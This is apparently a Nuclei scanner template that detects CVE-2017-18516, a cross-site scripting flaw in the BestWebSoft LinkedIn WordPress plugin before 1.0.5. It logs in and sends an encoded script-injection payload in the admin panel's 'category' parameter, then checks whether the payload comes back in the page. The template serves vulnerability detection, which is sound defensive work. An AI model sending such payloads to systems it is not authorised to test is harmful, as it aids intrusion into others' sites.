nuclei-templates/http/cves/2017/CVE-2017-18516.yaml

55 lines
2.0 KiB
YAML

id: CVE-2017-18516
info:
name: LinkedIn by BestWebSoft < 1.0.5 - Cross-Site Scripting
author: luisfelipe146
severity: medium
description: |
The bws-linkedin plugin before 1.0.5 for WordPress has multiple XSS issues.
remediation: Fixed in version 1.0.5
reference:
- https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694
- https://nvd.nist.gov/vuln/detail/CVE-2017-18516
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18516
- https://wordpress.org/plugins/bws-linkedin/#developers
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-18516
cwe-id: CWE-79
epss-score: 0.00088
epss-percentile: 0.36836
cpe: cpe:2.3:a:bestwebsoft:linkedin:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: bestwebsoft
product: linkedin
framework: wordpress
publicwww-query: "/wp-content/plugins/bws-linkedin/"
tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated,bestwebsoft
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/bws-linkedin/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(header_2, "text/html")'
- 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")'
- 'contains(body_3, "LinkedIn by BestWebSoft")'
condition: and
# digest: 4a0a00473045022100a4098e76f7a55d8322e7d021a7eb38813ded4ec6d28cf311172d96b63872272c02204aa37545bb0e8ebbd130f622c72698d7d0305c164a9e707c1c013d6bd1b2e961:922c64590222798bb761d5b6d8e72950